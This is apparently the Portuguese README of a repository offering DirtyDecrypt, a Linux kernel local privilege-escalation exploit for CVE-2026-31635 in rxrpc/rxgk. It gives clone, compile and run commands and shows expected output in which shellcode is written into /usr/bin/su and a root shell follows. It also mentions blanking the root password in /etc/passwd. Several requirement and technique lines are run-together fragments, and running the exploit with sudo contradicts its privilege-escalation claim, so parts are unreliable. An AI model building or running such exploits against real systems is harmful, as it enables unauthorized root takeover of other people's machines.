
CVE-2026-31635
Escalação Local de Privilégio no Kernel Linux via Corrupção de Cache de Páginas RXGK
DirtyDecrypt (CVE-2026-31635) é uma vulnerabilidade de escalação local de privilégio no subsistema rxrpc do kernel Linux (especificamente no componente rxgk).
Ele abusa de uma verificação ausente de Copy-on-Write (COW) durante a descriptografia AES-CBC, permitindo que um usuário não privilegiado corrompa o cache de páginas e realize escritas arbitrárias em arquivos, levando ao acesso root.
/etc/passwd (senha root em branco)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGK ativadoAF_RXRPCkeyctl (para chaves rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
Saída bem-sucedida esperada:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Main exploit
├── README.md # This file
├── Makefile # Optional
└── exploit.log # Optional output log
AF_RXRPC + splice() para forçar páginas do cache de páginas no caminho de descriptografia RXGKskb_cow_data()/etc/passwd) byte por byte usando técnica de janela deslizanteEste exploit é apenas para testes de segurança educacionais e autorizados.
O uso não autorizado em sistemas que você não possui é ilegal.
⭐ Dê uma estrela neste repositório se te ajudou!
Feito com ❤️ para a comunidade de pesquisa